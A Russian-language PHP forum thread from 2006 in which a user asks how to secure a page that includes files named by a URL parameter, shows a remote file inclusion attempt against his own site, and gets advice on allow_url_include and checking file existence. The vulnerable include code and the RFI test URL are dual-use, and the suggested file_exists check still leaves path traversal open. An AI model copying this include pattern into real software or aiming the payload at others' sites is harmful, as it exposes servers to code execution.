Модераторы: skyboy, MoLeX, Aliance, ksnk

Поиск:

Закрытая темаСоздание новой темы Создание опроса
> Помогите научиться программировать на PHP, с вашей помощью и заданий 
:(
    Опции темы
Redstuff
Дата 25.7.2006, 22:45 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Команда REDSTUFF
**


Профиль
Группа: Участник
Сообщений: 497
Регистрация: 27.5.2006
Где: Санкт-Петербург

Репутация: нет
Всего: 1
include @$_GET['content'].".php"
ага, как это обойти? хотя токо что делал так:
http://site1/index.php?content=send
менял на:
http://site1/index.php?content=http://site2/hack.php
и ничего не выводило 


--------------------
ГОСТы, СНиПы, ТУ...
<реклама удалена администрацией форума>
PM MAIL WWW ICQ Skype   Вверх
BobiKK
Дата 25.7.2006, 23:00 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 655
Регистрация: 1.12.2005
Где: Essen, Deutschlan d

Репутация: 4
Всего: 16
1) Если ты вставлял именно такое значение в content, то инклюдился бы у тебя http://site2/hack.php.php smile
2) В php.ini возможно запрещено использование url в include, fopen и т.д.

В любом случае, включи вывод всех ошибок и посмотри, на что интерпретатор ругается.

Как избежать подключения нежелательного:
1) Не использовать в include переменные. Попытаться как-то это обходить
2) Проверять на допустимое значение. Скажем,
Код

if (file_exists("modules/".$_GET['content'])) include ("modules/".$_GET['content']);
  

Это сообщение отредактировал(а) BobiKK - 25.7.2006, 23:00
PM MAIL   Вверх
Redstuff
Дата 25.7.2006, 23:27 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Команда REDSTUFF
**


Профиль
Группа: Участник
Сообщений: 497
Регистрация: 27.5.2006
Где: Санкт-Петербург

Репутация: нет
Всего: 1
Цитата

1) Если ты вставлял именно такое значение в content, то инклюдился бы у тебя http://site2/hack.php.php 

да, без расширения работает.

Ну допустим переменные в некоторых страницах уберу, а как тогда обработать функцию?
У меня есть пару страниц, где выводиться много картинок, и все это делает такая функция:
Код

$dir=getcwd ()."/dir/";
$dh  = opendir($dir);
while (false !== ($filename = readdir($dh))) {
  $files[] = $filename;
  $a=basename($filename);
  if($a!='.' && $a!='..') {
    echo "<img src=dir/$a border=0><br>";
  }
}
 


--------------------
ГОСТы, СНиПы, ТУ...
<реклама удалена администрацией форума>
PM MAIL WWW ICQ Skype   Вверх
BobiKK
Дата 25.7.2006, 23:37 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 655
Регистрация: 1.12.2005
Где: Essen, Deutschlan d

Репутация: 4
Всего: 16
А где в этой фунцкии переменные из  адресной строки? 
PM MAIL   Вверх
Redstuff
Дата 25.7.2006, 23:49 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Команда REDSTUFF
**


Профиль
Группа: Участник
Сообщений: 497
Регистрация: 27.5.2006
Где: Санкт-Петербург

Репутация: нет
Всего: 1
Значит такое можно инклюдить?

Добавлено @ 23:55 
Приведуы страниц:

index.php
Код

------
<tr>
<td><a class="mainlevel" href="index.php?content=file">Картинки</a></td>
</tr>

<tr>
<td><a class="mainlevel" href="index.php?content=rule">Правила</a></td>
</tr>

<tr>
<td><a class="mainlevel" href="index.php?content=contact">Контакты</a></td>
</tr>
------
<tr>
<td>
  <?
      @ include $_GET['content'].".php";
      echo @$text;
  ?>
</td>
</tr>
------


rule.php
Код

html текст, или просто текст...


file.php
Код

<?php
$dir=getcwd ()."/dir/";
$dh  = opendir($dir);
while (false !== ($filename = readdir($dh))) {
   $files[] = $filename;
   $a=basename($filename);
  if($a!='.' && $a!='..') {
  echo "<img src=dir/$a border=0><br>";
  }
}
?>
    

Это сообщение отредактировал(а) Redstuff - 26.7.2006, 00:00


--------------------
ГОСТы, СНиПы, ТУ...
<реклама удалена администрацией форума>
PM MAIL WWW ICQ Skype   Вверх
BobiKK
Дата 26.7.2006, 08:30 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 655
Регистрация: 1.12.2005
Где: Essen, Deutschlan d

Репутация: 4
Всего: 16
Ну прежде, чем инклюдить, проверить, если такой файл. 
PM MAIL   Вверх
Закрытая темаСоздание новой темы Создание опроса
Правила форума "PHP"
Aliance
IZ@TOP
skyboy
SamDark
MoLeX

Новичкам:

  • PHP редакторы собираются и обсуждаются здесь
  • Электронные книги по PHP, документацию можно найти здесь
  • Интерпретатор PHP, полную документацию можно скачать на PHP.NET

Важно:

  • Не брезгуйте пользоваться тегами [code=php]КОД[/code] для повышения читабельности текста/кода.
  • Перед созданием новой темы воспользуйтесь поиском и загляните в FAQ
  • Действия модераторов можно обсудить здесь

Внимание:

  • Темы "ищу скрипт", "подскажите скрипт" и т.п. будут переноситься в форум "Web-технологии"
  • Темы с именами: "Срочно", "помогите", "не знаю как делать" будут УДАЛЯТЬСЯ

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers.
 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | PHP: Общие вопросы | Следующая тема »

Подписаться на тему | Подписка на этот форум | Скачать/Распечатать тему


 




[ Время генерации скрипта: 0.0729 ]   [ Использовано запросов: 22 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
 По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.